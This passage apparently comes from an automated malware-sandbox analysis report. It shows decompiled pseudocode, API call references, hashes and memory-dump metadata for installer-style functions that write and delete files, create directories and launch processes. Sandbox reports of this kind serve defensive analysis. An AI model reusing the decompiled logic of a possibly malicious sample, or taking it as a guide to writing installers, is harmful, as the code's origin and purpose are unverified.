                                                                                                                                                                                                  0x00401bd5
                                                                                                                                                                                                  0x00401bd5
                                                                                                                                                                                                  0x00401bda
                                                                                                                                                                                                  0x00401be1
                                                                                                                                                                                                  0x00401be2
                                                                                                                                                                                                  0x00401be7
                                                                                                                                                                                                  0x00401be7
                                                                                                                                                                                                  0x00401bcf
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00401b84
                                                                                                                                                                                                  0x00401b84
                                                                                                                                                                                                  0x00401b84
                                                                                                                                                                                                  0x00401b87
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00401b8d
                                                                                                                                                                                                  0x00401b91
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00401b93
                                                                                                                                                                                                  0x00401b95
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00401b9b
                                                                                                                                                                                                  0x00401b9b
                                                                                                                                                                                                  0x00401b9e
                                                                                                                                                                                                  0x00401ba5
                                                                                                                                                                                                  0x00401baa
                                                                                                                                                                                                  0x00401bb4
                                                                                                                                                                                                  0x00401bb9
                                                                                                                                                                                                  0x00401bbe
                                                                                                                                                                                                  0x00401bc2
                                                                                                                                                                                                  0x004029e1
                                                                                                                                                                                                  0x00402ac5
                                                                                                                                                                                                  0x00402ac8
                                                                                                                                                                                                  0x00402ace
                                                                                                                                                                                                  0x00402ace
                                                                                                                                                                                                  0x00401b95
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00401b91
                                                                                                                                                                                                  0x004022e4
                                                                                                                                                                                                  0x004022f1
                                                                                                                                                                                                  0x004022f2
                                                                                                                                                                                                  0x004022f7
                                                                                                                                                                                                  0x004022f7
                                                                                                                                                                                                  0x00402ad0
                                                                                                                                                                                                  0x00402ad4

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GlobalFree.KERNELBASE ref: 00401BE7
                                                                                                                                                                                                  • GlobalAlloc.KERNELBASE(00000040,00004004), ref: 00401BF9
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000014.00000002.399238187.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000014.00000002.399216302.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399337096.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399352909.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399369646.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399559254.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399581098.0000000000471000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399594957.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_400000_wns22DB.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Global$AllocFree
                                                                                                                                                                                                  • String ID: ExecToStack
                                                                                                                                                                                                  • API String ID: 3394109436-166031814
                                                                                                                                                                                                  • Opcode ID: 5789c19cf9602a48abb49991963c2d85817d7f240d7a359f3be5c16f92e619a3
                                                                                                                                                                                                  • Instruction ID: 2224cfe726421d4168c30344d3cbfba70e659b3895da8488867bc6a87a7a29a6
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5789c19cf9602a48abb49991963c2d85817d7f240d7a359f3be5c16f92e619a3
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5321EB72A00200ABDB10EF95CEC49DE73A4AB543187A4403BF506F32D1DB78E891CB6D
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 00402598 Relevance: 4.6, APIs: 3, Instructions: 69stringCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  C-Code - Quality: 94%
                                                                                                                                                                                                  			E00402598(int __ebx, void* __edx, intOrPtr* __esi) {
				signed int _t14;
				int _t17;
				int _t24;
				signed int _t29;
				intOrPtr* _t32;
				void* _t34;
				void* _t35;
				void* _t38;
				signed int _t40;

				_t32 = __esi;
				_t24 = __ebx;
				_t14 =  *(_t35 - 0x20);
				_t38 = __edx - 0x38;
				 *(_t35 - 0x4c) = _t14;
				_t27 = 0 | _t38 == 0x00000000;
				_t29 = _t38 == 0;
				if(_t14 == __ebx) {
					if(__edx != 0x38) {
						_t17 = lstrlenW(E00402C41(0x11)) + _t16;
					} else {
						E00402C41(0x21);
						WideCharToMultiByte(__ebx, __ebx, 0x4125d8, 0xffffffff, 0x40e5d8, 0x2000, __ebx, __ebx);
						_t17 = lstrlenA(0x40e5d8);
					}
				} else {
					E00402C1F(1);
					 *0x40e5d8 = __ax;
					 *((intOrPtr*)(__ebp - 0x3c)) = __edx;
				}
				 *(_t35 + 8) = _t17;
				if( *_t32 == _t24) {
					L13:
					 *((intOrPtr*)(_t35 - 4)) = 1;
				} else {
					_t34 = E00406348(_t27, _t32);
					if((_t29 |  *(_t35 - 0x4c)) != 0 ||  *((intOrPtr*)(_t35 - 0x1c)) == _t24 || E00405FBF(_t34, _t34) >= 0) {
						_t14 = E00405F90(_t34, 0x40e5d8,  *(_t35 + 8)); // executed
						_t40 = _t14;
						if(_t40 == 0) {
							goto L13;
						}
					} else {
						goto L13;
					}
				}
				 *0x4702e8 =  *0x4702e8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}












                                                                                                                                                                                                  0x00402598
                                                                                                                                                                                                  0x00402598
                                                                                                                                                                                                  0x00402598
                                                                                                                                                                                                  0x0040259d
                                                                                                                                                                                                  0x004025a0
                                                                                                                                                                                                  0x004025a3
                                                                                                                                                                                                  0x004025a8
                                                                                                                                                                                                  0x004025aa
                                                                                                                                                                                                  0x004025ca
                                                                                                                                                                                                  0x00402608
                                                                                                                                                                                                  0x004025cc
                                                                                                                                                                                                  0x004025ce
                                                                                                                                                                                                  0x004025e8
                                                                                                                                                                                                  0x004025f3
                                                                                                                                                                                                  0x004025f3
                                                                                                                                                                                                  0x004025ac
                                                                                                                                                                                                  0x004025ae
                                                                                                                                                                                                  0x004025b3
                                                                                                                                                                                                  0x004025c1
                                                                                                                                                                                                  0x004025c4
                                                                                                                                                                                                  0x0040260d
                                                                                                                                                                                                  0x00402610
                                                                                                                                                                                                  0x0040288b
                                                                                                                                                                                                  0x0040288b
                                                                                                                                                                                                  0x00402616
                                                                                                                                                                                                  0x0040261f
                                                                                                                                                                                                  0x00402621
                                                                                                                                                                                                  0x00402640
                                                                                                                                                                                                  0x004015b4
                                                                                                                                                                                                  0x004015b6
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004015bc
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00402621
                                                                                                                                                                                                  0x00402ac8
                                                                                                                                                                                                  0x00402ad4

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(?,?,004125D8,000000FF,0040E5D8,00002000,?,?,00000021), ref: 004025E8
                                                                                                                                                                                                  • lstrlenA.KERNEL32(0040E5D8,?,?,004125D8,000000FF,0040E5D8,00002000,?,?,00000021), ref: 004025F3
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000014.00000002.399238187.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000014.00000002.399216302.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399337096.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399352909.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399369646.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399559254.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399581098.0000000000471000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399594957.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_400000_wns22DB.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ByteCharMultiWidelstrlen
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3109718747-0
                                                                                                                                                                                                  • Opcode ID: 28396a338a8ef95373087da8c8dfe09d90bc6a648febf9c66dc912ffd45ec8c4
                                                                                                                                                                                                  • Instruction ID: 8a54b08748082a87d090de781de000be55bd47bcbf4860f745c9e519e4ad5c94
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 28396a338a8ef95373087da8c8dfe09d90bc6a648febf9c66dc912ffd45ec8c4
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 66110872A05201BADB146BF18E8DA9F7664AF44398F20483BF502F21D1DDFC89815B5D
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 00405AB2 Relevance: 4.5, APIs: 3, Instructions: 28fileCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  C-Code - Quality: 41%
                                                                                                                                                                                                  			E00405AB2(void* __eflags, WCHAR* _a4, signed int _a8) {
				int _t9;
				long _t13;
				WCHAR* _t14;

				_t14 = _a4;
				_t13 = E00405EB9(_t14);
				if(_t13 == 0xffffffff) {
					L8:
					return 0;
				}
				_push(_t14);
				if((_a8 & 0x00000001) == 0) {
					_t9 = DeleteFileW(); // executed
				} else {
					_t9 = RemoveDirectoryW(); // executed
				}
				if(_t9 == 0) {
					if((_a8 & 0x00000004) == 0) {
						SetFileAttributesW(_t14, _t13);
					}
					goto L8;
				} else {
					return 1;
				}
			}






                                                                                                                                                                                                  0x00405ab3
                                                                                                                                                                                                  0x00405abe
                                                                                                                                                                                                  0x00405ac3
                                                                                                                                                                                                  0x00405af3
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00405af3
                                                                                                                                                                                                  0x00405aca
                                                                                                                                                                                                  0x00405acb
                                                                                                                                                                                                  0x00405ad5
                                                                                                                                                                                                  0x00405acd
                                                                                                                                                                                                  0x00405acd
                                                                                                                                                                                                  0x00405acd
                                                                                                                                                                                                  0x00405add
                                                                                                                                                                                                  0x00405ae9
                                                                                                                                                                                                  0x00405aed
                                                                                                                                                                                                  0x00405aed
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00405adf
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00405ae1

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 00405EB9: GetFileAttributesW.KERNELBASE(?,?,00405ABE,?,?,00000000,00405C94,?,?,?,?), ref: 00405EBE
                                                                                                                                                                                                    • Part of subcall function 00405EB9: SetFileAttributesW.KERNELBASE(?,00000000), ref: 00405ED2
                                                                                                                                                                                                  • RemoveDirectoryW.KERNELBASE(?,?,?,00000000,00405C94), ref: 00405ACD
                                                                                                                                                                                                  • DeleteFileW.KERNELBASE(?,?,?,00000000,00405C94), ref: 00405AD5
                                                                                                                                                                                                  • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405AED
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000014.00000002.399238187.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000014.00000002.399216302.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399337096.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399352909.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399369646.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399559254.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399581098.0000000000471000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399594957.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_400000_wns22DB.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: File$Attributes$DeleteDirectoryRemove
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1655745494-0
                                                                                                                                                                                                  • Opcode ID: ee26814d0e89ccba1e58ecbc8b5a308cd0754c8ce938ef3c5221310ac7d33209
                                                                                                                                                                                                  • Instruction ID: 2750ea62591d09886f88fd119c0b0bc2019991ac89723f17ff6745a253c15028
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ee26814d0e89ccba1e58ecbc8b5a308cd0754c8ce938ef3c5221310ac7d33209
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6CE0E531305A9056C7106B759A48B5B3AD8EF8E324F060B3BF592F11C0CBB845068FBD
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 00401E7D Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 54COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  C-Code - Quality: 69%
                                                                                                                                                                                                  			E00401E7D() {
				intOrPtr _t20;
				void* _t39;
				void* _t42;
				void* _t47;

				_t45 = E00402C41(_t39);
				_t20 = E00402C41(0x31);
				_t43 = E00402C41(0x22);
				E00402C41(0x15);
				E00401423(0xffffffec);
				 *(_t47 - 0x80) =  *(_t47 - 0x18);
				 *((intOrPtr*)(_t47 - 0x7c)) =  *((intOrPtr*)(_t47 - 8));
				 *((intOrPtr*)(_t47 - 0x68)) =  *((intOrPtr*)(_t47 - 0x1c));
				asm("sbb eax, eax");
				 *((intOrPtr*)(_t47 - 0x74)) = _t20;
				 *(_t47 - 0x78) =  ~( *_t19) & _t45;
				asm("sbb eax, eax");
				 *((intOrPtr*)(_t47 - 0x6c)) = 0x4c9000;
				 *(_t47 - 0x70) =  ~( *_t21) & _t43;
				if(E00405A14(_t47 - 0x84) == 0) {
					 *((intOrPtr*)(_t47 - 4)) = 1;
				} else {
					if(( *(_t47 - 0x80) & 0x00000040) != 0) {
						E00406873(_t42,  *((intOrPtr*)(_t47 - 0x4c)));
						_push( *((intOrPtr*)(_t47 - 0x4c)));
						FindCloseChangeNotification(); // executed
					}
				}
				 *0x4702e8 =  *0x4702e8 +  *((intOrPtr*)(_t47 - 4));
				return 0;
			}







                                                                                                                                                                                                  0x00401e85
                                                                                                                                                                                                  0x00401e87
                                                                                                                                                                                                  0x00401e97
                                                                                                                                                                                                  0x00401e99
                                                                                                                                                                                                  0x00401ea0
                                                                                                                                                                                                  0x00401ea8
                                                                                                                                                                                                  0x00401eae
                                                                                                                                                                                                  0x00401eb4
                                                                                                                                                                                                  0x00401ebd
                                                                                                                                                                                                  0x00401ebf
                                                                                                                                                                                                  0x00401ec4
                                                                                                                                                                                                  0x00401ecd
                                                                                                                                                                                                  0x00401ecf
                                                                                                                                                                                                  0x00401ed8
                                                                                                                                                                                                  0x00401ee9
                                                                                                                                                                                                  0x0040288b
                                                                                                                                                                                                  0x00401eef
                                                                                                                                                                                                  0x00401ef3
                                                                                                                                                                                                  0x00401efc
                                                                                                                                                                                                  0x00401f01
                                                                                                                                                                                                  0x00401f4d
                                                                                                                                                                                                  0x00401f4d
                                                                                                                                                                                                  0x00401ef3
                                                                                                                                                                                                  0x00402ac8
                                                                                                                                                                                                  0x00402ad4

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 00405A14: ShellExecuteExW.SHELL32(?), ref: 00405A23
                                                                                                                                                                                                    • Part of subcall function 00406873: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406884
                                                                                                                                                                                                    • Part of subcall function 00406873: GetExitCodeProcess.KERNEL32 ref: 004068A6
                                                                                                                                                                                                  • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?), ref: 00401F4D
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000014.00000002.399238187.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000014.00000002.399216302.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399337096.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399352909.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399369646.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399559254.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399581098.0000000000471000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399594957.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_400000_wns22DB.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ChangeCloseCodeExecuteExitFindNotificationObjectProcessShellSingleWait
                                                                                                                                                                                                  • String ID: @
                                                                                                                                                                                                  • API String ID: 4215836453-2766056989
                                                                                                                                                                                                  • Opcode ID: 39f81d2894766911e758ec91e5a89d3189affdb352d3a3bfd1456e05092c055f
                                                                                                                                                                                                  • Instruction ID: e7e9fe02224fa80e8acc3d91e69a95aa357927643f4877ada07b0f7c2baa17a7
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 39f81d2894766911e758ec91e5a89d3189affdb352d3a3bfd1456e05092c055f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 01112B75E142049BDB10EFB9DA89A8DBBB0AB48304F24453AE555F72D2DBB888419F18
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 00405F90 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22fileCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                                  			E00405F90(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                                                                                                                                                                                                  0x00405f94
                                                                                                                                                                                                  0x00405fa4
                                                                                                                                                                                                  0x00405fac
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00405fb3
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00405fb5

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • WriteFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,00420B66,rects:10,prefixUrl:"",methodRewriting:!0,ignoreInvalidCookies:!1,context:{},http2:!1,allowGetBody:!1,https:void 0,pagination:{transform:u=>u.request.options.responseType==="json"?u.body:JSON.parse(u.body),paginate:u=>{if(!Reflect.has(u.headers,"link"))return!1,004033DE,rects:10,prefixUrl:"",methodRewriting:!0,ignoreInvalidCookies:!1,context:{},http2:!1,allowGetBody:!1,https:void 0,pagination:{transform:u=>u.request.options.responseType==="json"?u.body:JSON.parse(u.body),paginate:u=>{if(!Reflect.has(u.headers,"link"))return!1,00420B66,dlers:o,mutableDefaults:Boolean(y)})};const L=async function*(P,g){let o=_(P,g,v.options);o.resolveBodyOnly=!1;const y=o.pagination;if(!s.default.object(y))throw new TypeError("`options.pagination` must be implemented");const R=[];let{countLimit:C}=y,F=0;for(;,00004000,?,00000000,00403208,00000004), ref: 00405FA4
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  • rects:10,prefixUrl:"",methodRewriting:!0,ignoreInvalidCookies:!1,context:{},http2:!1,allowGetBody:!1,https:void 0,pagination:{transform:u=>u.request.options.responseType==="json"?u.body:JSON.parse(u.body),paginate:u=>{if(!Reflect.has(u.headers,"link"))return!1, xrefs: 00405F90
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000014.00000002.399238187.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000014.00000002.399216302.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399337096.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399352909.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399369646.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399559254.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399581098.0000000000471000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399594957.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_400000_wns22DB.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: FileWrite
                                                                                                                                                                                                  • String ID: rects:10,prefixUrl:"",methodRewriting:!0,ignoreInvalidCookies:!1,context:{},http2:!1,allowGetBody:!1,https:void 0,pagination:{transform:u=>u.request.options.responseType==="json"?u.body:JSON.parse(u.body),paginate:u=>{if(!Reflect.has(u.headers,"link"))return!1
                                                                                                                                                                                                  • API String ID: 3934441357-3364461195
                                                                                                                                                                                                  • Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                                                                                                                                                  • Instruction ID: 11bffb161eade2b6c2cb4bf4b25223a29cd6195b7324502744f40ed25e3c63a9
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 20E08C3220125BEBEF119E518C00AEBBB6CFB003A0F004432FD11E3180D234E9208BA8
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 004015C1 Relevance: 3.1, APIs: 2, Instructions: 65COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  C-Code - Quality: 86%
                                                                                                                                                                                                  			E004015C1(short __ebx, void* __eflags) {
				void* _t17;
				int _t23;
				void* _t25;
				signed char _t26;
				short _t28;
				short _t31;
				short* _t34;
				void* _t36;

				_t28 = __ebx;
				 *(_t36 + 8) = E00402C41(0xfffffff0);
				_t17 = E00405D68(_t16);
				_t32 = _t17;
				if(_t17 != __ebx) {
					do {
						_t34 = E00405CEA(_t32, 0x5c);
						_t31 =  *_t34;
						 *_t34 = _t28;
						if(_t31 != _t28) {
							L5:
							_t25 = E0040599C( *(_t36 + 8));
						} else {
							_t42 =  *((intOrPtr*)(_t36 - 0x20)) - _t28;
							if( *((intOrPtr*)(_t36 - 0x20)) == _t28 || E004059B9(_t42) == 0) {
								goto L5;
							} else {
								_t25 = E0040591F( *(_t36 + 8)); // executed
							}
						}
						if(_t25 != _t28) {
							if(_t25 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
							} else {
								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
								if((_t26 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						 *_t34 = _t31;
						_t32 = _t34 + 2;
					} while (_t31 != _t28);
				}
				if( *((intOrPtr*)(_t36 - 0x24)) == _t28) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E004063E8(0x4c9000,  *(_t36 + 8));
					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
					if(_t23 == 0) {
						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
					}
				}
				 *0x4702e8 =  *0x4702e8 +  *((intOrPtr*)(_t36 - 4));
				return 0;
			}











                                                                                                                                                                                                  0x004015c1
                                                                                                                                                                                                  0x004015c9
                                                                                                                                                                                                  0x004015cc
                                                                                                                                                                                                  0x004015d1
                                                                                                                                                                                                  0x004015d5
                                                                                                                                                                                                  0x004015d7
                                                                                                                                                                                                  0x004015df
                                                                                                                                                                                                  0x004015e1
                                                                                                                                                                                                  0x004015e4
                                                                                                                                                                                                  0x004015ea
                                                                                                                                                                                                  0x00401604
                                                                                                                                                                                                  0x00401607
                                                                                                                                                                                                  0x004015ec
                                                                                                                                                                                                  0x004015ec
                                                                                                                                                                                                  0x004015ef
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004015fa
                                                                                                                                                                                                  0x004015fd
                                                                                                                                                                                                  0x004015fd
                                                                                                                                                                                                  0x004015ef
                                                                                                                                                                                                  0x0040160e
                                                                                                                                                                                                  0x00401615
                                                                                                                                                                                                  0x00401624
                                                                                                                                                                                                  0x00401624
                                                                                                                                                                                                  0x00401617
                                                                                                                                                                                                  0x0040161a
                                                                                                                                                                                                  0x00401622
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00401622
                                                                                                                                                                                                  0x00401615
                                                                                                                                                                                                  0x00401627
                                                                                                                                                                                                  0x0040162b
                                                                                                                                                                                                  0x0040162c
                                                                                                                                                                                                  0x004015d7
                                                                                                                                                                                                  0x00401634
                                                                                                                                                                                                  0x00401663
                                                                                                                                                                                                  0x0040224b
                                                                                                                                                                                                  0x00401636
                                                                                                                                                                                                  0x00401638
                                                                                                                                                                                                  0x00401645
                                                                                                                                                                                                  0x0040164d
                                                                                                                                                                                                  0x00401655
                                                                                                                                                                                                  0x0040165b
                                                                                                                                                                                                  0x0040165b
                                                                                                                                                                                                  0x00401655
                                                                                                                                                                                                  0x00402ac8
                                                                                                                                                                                                  0x00402ad4

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 00405D68: CharNextW.USER32(?,?,0045A730,?,00405DDC,0045A730,0045A730,004D5000,?,746AF560,00405B1A,?,004D5000,746AF560,00000000), ref: 00405D76
                                                                                                                                                                                                    • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D7B
                                                                                                                                                                                                    • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D93
                                                                                                                                                                                                  • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                                                                                                                                                    • Part of subcall function 0040591F: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405962
                                                                                                                                                                                                  • SetCurrentDirectoryW.KERNELBASE(?,004C9000,?,00000000,000000F0), ref: 0040164D
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000014.00000002.399238187.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000014.00000002.399216302.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399337096.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399352909.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399369646.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399559254.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399581098.0000000000471000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399594957.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_400000_wns22DB.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1892508949-0
